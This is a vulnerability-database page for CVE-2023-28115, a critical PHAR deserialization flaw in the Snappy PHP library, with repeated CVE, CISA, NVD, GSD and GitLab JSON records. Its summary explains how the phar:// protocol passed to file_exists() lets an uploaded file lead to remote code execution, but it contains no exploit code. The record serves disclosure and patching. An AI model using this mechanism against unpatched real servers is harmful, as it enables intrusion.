CVE-2023-28115 (GCVE-0-2023-28115)

Vulnerability from cvelistv5

Published

2023-03-17 21:15

Modified

2025-02-25 14:53

Severity ?

9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-502 - Deserialization of Untrusted Data

Summary

Snappy is a PHP library allowing thumbnail, snapshot or PDF generation from a url or a html page. Prior to version 1.4.2, Snappy is vulnerable to PHAR deserialization due to a lack of checking on the protocol before passing it into the `file_exists()` function. If an attacker can upload files of any type to the server he can pass in the phar:// protocol to unserialize the uploaded file and instantiate arbitrary PHP objects. This can lead to remote code execution especially when snappy is used with frameworks with documented POP chains like Laravel/Symfony vulnerable developer code. If a user can control the output file from the `generateFromHtml()` function, it will invoke deserialization. This vulnerability is capable of remote code execution if Snappy is used with frameworks or developer code with vulnerable POP chains. It has been fixed in version 1.4.2.

References

URL	Tags
security-advisories@github.com	https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670	Product
security-advisories@github.com	https://github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6	Patch
security-advisories@github.com	https://github.com/KnpLabs/snappy/commit/b66f79334421c26d9c244427963fa2d92980b5d3	Patch
security-advisories@github.com	https://github.com/KnpLabs/snappy/pull/469	Patch
security-advisories@github.com	https://github.com/KnpLabs/snappy/releases/tag/v1.4.2	Release Notes
security-advisories@github.com	https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc	Exploit, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670	Product
af854a3a-2127-422b-91ae-364da2661108	https://github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6	Patch
af854a3a-2127-422b-91ae-364da2661108	https://github.com/KnpLabs/snappy/commit/b66f79334421c26d9c244427963fa2d92980b5d3	Patch
af854a3a-2127-422b-91ae-364da2661108	https://github.com/KnpLabs/snappy/pull/469	Patch
af854a3a-2127-422b-91ae-364da2661108	https://github.com/KnpLabs/snappy/releases/tag/v1.4.2	Release Notes
af854a3a-2127-422b-91ae-364da2661108	https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	KnpLabs	snappy	Version: < 1.4.2

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T12:30:24.135Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc",
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc"
          },
          {
            "name": "https://github.com/KnpLabs/snappy/pull/469",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/KnpLabs/snappy/pull/469"
          },
          {
            "name": "https://github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6"
          },
          {
            "name": "https://github.com/KnpLabs/snappy/commit/b66f79334421c26d9c244427963fa2d92980b5d3",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/KnpLabs/snappy/commit/b66f79334421c26d9c244427963fa2d92980b5d3"
          },
          {
            "name": "https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670"
          },
          {
            "name": "https://github.com/KnpLabs/snappy/releases/tag/v1.4.2",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/KnpLabs/snappy/releases/tag/v1.4.2"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2023-28115",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-02-25T14:31:03.179492Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-02-25T14:53:10.142Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "snappy",
          "vendor": "KnpLabs",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 1.4.2"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Snappy is a PHP library allowing thumbnail, snapshot or PDF generation from a url or a html page. Prior to version 1.4.2, Snappy is vulnerable to PHAR deserialization due to a lack of checking on the protocol before passing it into the `file_exists()` function. If an attacker can upload files of any type to the server he can pass in the phar:// protocol to unserialize the uploaded file and instantiate arbitrary PHP objects. This can lead to remote code execution especially when snappy is used with frameworks with documented POP chains like Laravel/Symfony vulnerable developer code. If a user can control the output file from the `generateFromHtml()` function, it will invoke deserialization. This vulnerability is capable of remote code execution if Snappy is used with frameworks or developer code with vulnerable POP chains. It has been fixed in version 1.4.2."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-502",
              "description": "CWE-502: Deserialization of Untrusted Data",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-03-17T21:15:25.113Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc"
        },
        {
          "name": "https://github.com/KnpLabs/snappy/pull/469",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/KnpLabs/snappy/pull/469"
        },
        {
          "name": "https://github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6"
        },
        {
          "name": "https://github.com/KnpLabs/snappy/commit/b66f79334421c26d9c244427963fa2d92980b5d3",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/KnpLabs/snappy/commit/b66f79334421c26d9c244427963fa2d92980b5d3"
        },
        {
          "name": "https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670"
        },
        {
          "name": "https://github.com/KnpLabs/snappy/releases/tag/v1.4.2",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/KnpLabs/snappy/releases/tag/v1.4.2"
        }
      ],
      "source": {
        "advisory": "GHSA-gq6w-q6wh-jggc",
        "discovery": "UNKNOWN"
      },
      "title": "Snappy vulnerable to PHAR deserialization, allowing remote code execution"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2023-28115",
    "datePublished": "2023-03-17T21:15:25.113Z",
    "dateReserved": "2023-03-10T18:34:29.228Z",
    "dateUpdated": "2025-02-25T14:53:10.142Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2023-28115\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2023-03-17T22:15:11.437\",\"lastModified\":\"2024-11-21T07:54:26.183\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Snappy is a PHP library allowing thumbnail, snapshot or PDF generation from a url or a html page. Prior to version 1.4.2, Snappy is vulnerable to PHAR deserialization due to a lack of checking on the protocol before passing it into the `file_exists()` function. If an attacker can upload files of any type to the server he can pass in the phar:// protocol to unserialize the uploaded file and instantiate arbitrary PHP objects. This can lead to remote code execution especially when snappy is used with frameworks with documented POP chains like Laravel/Symfony vulnerable developer code. If a user can control the output file from the `generateFromHtml()` function, it will invoke deserialization. This vulnerability is capable of remote code execution if Snappy is used with frameworks or developer code with vulnerable POP chains. It has been fixed in version 1.4.2.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":9.8,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":5.9},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":9.8,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-502\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:knplabs:snappy:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"1.4.2\",\"matchCriteriaId\":\"63871084-34B8-4CD8-ACEC-3EEAE2CA2EFE\"}]}]}],\"references\":[{\"url\":\"https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\"]},{\"url\":\"https://github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/KnpLabs/snappy/commit/b66f79334421c26d9c244427963fa2d92980b5d3\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/KnpLabs/snappy/pull/469\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/KnpLabs/snappy/releases/tag/v1.4.2\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Release Notes\"]},{\"url\":\"https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Product\"]},{\"url\":\"https://github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/KnpLabs/snappy/commit/b66f79334421c26d9c244427963fa2d92980b5d3\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/KnpLabs/snappy/pull/469\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/KnpLabs/snappy/releases/tag/v1.4.2\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Release Notes\"]},{\"url\":\"https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CVE Program Container\", \"references\": [{\"url\": \"https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc\", \"name\": \"https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc\", \"tags\": [\"x_refsource_CONFIRM\", \"x_transferred\"]}, {\"url\": \"https://github.com/KnpLabs/snappy/pull/469\", \"name\": \"https://github.com/KnpLabs/snappy/pull/469\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}, {\"url\": \"https://github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6\", \"name\": \"https://github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}, {\"url\": \"https://github.com/KnpLabs/snappy/commit/b66f79334421c26d9c244427963fa2d92980b5d3\", \"name\": \"https://github.com/KnpLabs/snappy/commit/b66f79334421c26d9c244427963fa2d92980b5d3\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}, {\"url\": \"https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670\", \"name\": \"https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}, {\"url\": \"https://github.com/KnpLabs/snappy/releases/tag/v1.4.2\", \"name\": \"https://github.com/KnpLabs/snappy/releases/tag/v1.4.2\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}], \"providerMetadata\": {\"orgId\": \"af854a3a-2127-422b-91ae-364da2661108\", \"shortName\": \"CVE\", \"dateUpdated\": \"2024-08-02T12:30:24.135Z\"}}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2023-28115\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-02-25T14:31:03.179492Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-02-25T14:31:04.560Z\"}}], \"cna\": {\"title\": \"Snappy vulnerable to PHAR deserialization, allowing remote code execution\", \"source\": {\"advisory\": \"GHSA-gq6w-q6wh-jggc\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 9.8, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"CRITICAL\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"KnpLabs\", \"product\": \"snappy\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 1.4.2\"}]}], \"references\": [{\"url\": \"https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc\", \"name\": \"https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/KnpLabs/snappy/pull/469\", \"name\": \"https://github.com/KnpLabs/snappy/pull/469\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6\", \"name\": \"https://github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/KnpLabs/snappy/commit/b66f79334421c26d9c244427963fa2d92980b5d3\", \"name\": \"https://github.com/KnpLabs/snappy/commit/b66f79334421c26d9c244427963fa2d92980b5d3\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670\", \"name\": \"https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/KnpLabs/snappy/releases/tag/v1.4.2\", \"name\": \"https://github.com/KnpLabs/snappy/releases/tag/v1.4.2\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Snappy is a PHP library allowing thumbnail, snapshot or PDF generation from a url or a html page. Prior to version 1.4.2, Snappy is vulnerable to PHAR deserialization due to a lack of checking on the protocol before passing it into the `file_exists()` function. If an attacker can upload files of any type to the server he can pass in the phar:// protocol to unserialize the uploaded file and instantiate arbitrary PHP objects. This can lead to remote code execution especially when snappy is used with frameworks with documented POP chains like Laravel/Symfony vulnerable developer code. If a user can control the output file from the `generateFromHtml()` function, it will invoke deserialization. This vulnerability is capable of remote code execution if Snappy is used with frameworks or developer code with vulnerable POP chains. It has been fixed in version 1.4.2.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-502\", \"description\": \"CWE-502: Deserialization of Untrusted Data\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2023-03-17T21:15:25.113Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2023-28115\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-02-25T14:53:10.142Z\", \"dateReserved\": \"2023-03-10T18:34:29.228Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2023-03-17T21:15:25.113Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

gsd-2023-28115

Vulnerability from gsd

Modified

2023-12-13 01:20

Details

Aliases

CVE-2023-28115

Aliases

CVE-2023-28115

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2023-28115",
    "id": "GSD-2023-28115"
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2023-28115"
      ],
      "details": "Snappy is a PHP library allowing thumbnail, snapshot or PDF generation from a url or a html page. Prior to version 1.4.2, Snappy is vulnerable to PHAR deserialization due to a lack of checking on the protocol before passing it into the `file_exists()` function. If an attacker can upload files of any type to the server he can pass in the phar:// protocol to unserialize the uploaded file and instantiate arbitrary PHP objects. This can lead to remote code execution especially when snappy is used with frameworks with documented POP chains like Laravel/Symfony vulnerable developer code. If a user can control the output file from the `generateFromHtml()` function, it will invoke deserialization. This vulnerability is capable of remote code execution if Snappy is used with frameworks or developer code with vulnerable POP chains. It has been fixed in version 1.4.2.",
      "id": "GSD-2023-28115",
      "modified": "2023-12-13T01:20:46.862680Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "security-advisories@github.com",
        "ID": "CVE-2023-28115",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "snappy",
                    "version": {
                      "version_data": [
                        {
                          "version_affected": "=",
                          "version_value": "\u003c 1.4.2"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "KnpLabs"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "Snappy is a PHP library allowing thumbnail, snapshot or PDF generation from a url or a html page. Prior to version 1.4.2, Snappy is vulnerable to PHAR deserialization due to a lack of checking on the protocol before passing it into the `file_exists()` function. If an attacker can upload files of any type to the server he can pass in the phar:// protocol to unserialize the uploaded file and instantiate arbitrary PHP objects. This can lead to remote code execution especially when snappy is used with frameworks with documented POP chains like Laravel/Symfony vulnerable developer code. If a user can control the output file from the `generateFromHtml()` function, it will invoke deserialization. This vulnerability is capable of remote code execution if Snappy is used with frameworks or developer code with vulnerable POP chains. It has been fixed in version 1.4.2."
          }
        ]
      },
      "impact": {
        "cvss": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "cweId": "CWE-502",
                "lang": "eng",
                "value": "CWE-502: Deserialization of Untrusted Data"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc",
            "refsource": "MISC",
            "url": "https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc"
          },
          {
            "name": "https://github.com/KnpLabs/snappy/pull/469",
            "refsource": "MISC",
            "url": "https://github.com/KnpLabs/snappy/pull/469"
          },
          {
            "name": "https://github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6",
            "refsource": "MISC",
            "url": "https://github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6"
          },
          {
            "name": "https://github.com/KnpLabs/snappy/commit/b66f79334421c26d9c244427963fa2d92980b5d3",
            "refsource": "MISC",
            "url": "https://github.com/KnpLabs/snappy/commit/b66f79334421c26d9c244427963fa2d92980b5d3"
          },
          {
            "name": "https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670",
            "refsource": "MISC",
            "url": "https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670"
          },
          {
            "name": "https://github.com/KnpLabs/snappy/releases/tag/v1.4.2",
            "refsource": "MISC",
            "url": "https://github.com/KnpLabs/snappy/releases/tag/v1.4.2"
          }
        ]
      },
      "source": {
        "advisory": "GHSA-gq6w-q6wh-jggc",
        "discovery": "UNKNOWN"
      }
    },
    "gitlab.com": {
      "advisories": [
        {
          "affected_range": "\u003c=1.4.1",
          "affected_versions": "All versions up to 1.4.1",
          "cwe_ids": [
            "CWE-1035",
            "CWE-502",
            "CWE-78",
            "CWE-937"
          ],
          "date": "2023-03-17",
          "description": "Snappy is a PHP library allowing thumbnail, snapshot or PDF generation from a url or a html page. Prior to version 1.4.2, Snappy is vulnerable to PHAR deserialization due to a lack of checking on the protocol before passing it into the `file_exists()` function. If an attacker can upload files of any type to the server he can pass in the phar:// protocol to unserialize the uploaded file and instantiate arbitrary PHP objects. This can lead to remote code execution especially when snappy is used with frameworks with documented POP chains like Laravel/Symfony vulnerable developer code. If a user can control the output file from the `generateFromHtml()` function, it will invoke deserialization. This vulnerability is capable of remote code execution if Snappy is used with frameworks or developer code with vulnerable POP chains. It has been fixed in version 1.4.2.",
          "fixed_versions": [
            "1.4.2"
          ],
          "identifier": "CVE-2023-28115",
          "identifiers": [
            "GHSA-gq6w-q6wh-jggc",
            "CVE-2023-28115"
          ],
          "not_impacted": "All versions after 1.4.1",
          "package_slug": "packagist/knplabs/knp-snappy",
          "pubdate": "2023-03-17",
          "solution": "Upgrade to version 1.4.2 or above.",
          "title": "Deserialization of Untrusted Data",
          "urls": [
            "https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc",
            "https://github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6",
            "https://huntr.dev/bounties/0bdddc12-ff67-4815-ab9f-6011a974f48e/",
            "https://github.com/advisories/GHSA-gq6w-q6wh-jggc"
          ],
          "uuid": "b46ee422-ba82-48df-8d3f-ef95cf0a06d8"
        }
      ]
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:knplabs:snappy:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "1.4.2",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "security-advisories@github.com",
          "ID": "CVE-2023-28115"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "Snappy is a PHP library allowing thumbnail, snapshot or PDF generation from a url or a html page. Prior to version 1.4.2, Snappy is vulnerable to PHAR deserialization due to a lack of checking on the protocol before passing it into the `file_exists()` function. If an attacker can upload files of any type to the server he can pass in the phar:// protocol to unserialize the uploaded file and instantiate arbitrary PHP objects. This can lead to remote code execution especially when snappy is used with frameworks with documented POP chains like Laravel/Symfony vulnerable developer code. If a user can control the output file from the `generateFromHtml()` function, it will invoke deserialization. This vulnerability is capable of remote code execution if Snappy is used with frameworks or developer code with vulnerable POP chains. It has been fixed in version 1.4.2."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-502"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://github.com/KnpLabs/snappy/releases/tag/v1.4.2",
              "refsource": "MISC",
              "tags": [
                "Release Notes"
              ],
              "url": "https://github.com/KnpLabs/snappy/releases/tag/v1.4.2"
            },
            {
              "name": "https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc",
              "refsource": "MISC",
              "tags": [
                "Exploit",
                "Vendor Advisory"
              ],
              "url": "https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc"
            },
            {
              "name": "https://github.com/KnpLabs/snappy/commit/b66f79334421c26d9c244427963fa2d92980b5d3",
              "refsource": "MISC",
              "tags": [
                "Patch"
              ],
              "url": "https://github.com/KnpLabs/snappy/commit/b66f79334421c26d9c244427963fa2d92980b5d3"
            },
            {
              "name": "https://github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6",
              "refsource": "MISC",
              "tags": [
                "Patch"
              ],
              "url": "https://github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6"
            },
            {
              "name": "https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670",
              "refsource": "MISC",
              "tags": [
                "Product"
              ],
              "url": "https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670"
            },
            {
              "name": "https://github.com/KnpLabs/snappy/pull/469",
              "refsource": "MISC",
              "tags": [
                "Patch"
              ],
              "url": "https://github.com/KnpLabs/snappy/pull/469"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV3": {
          "cvssV3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
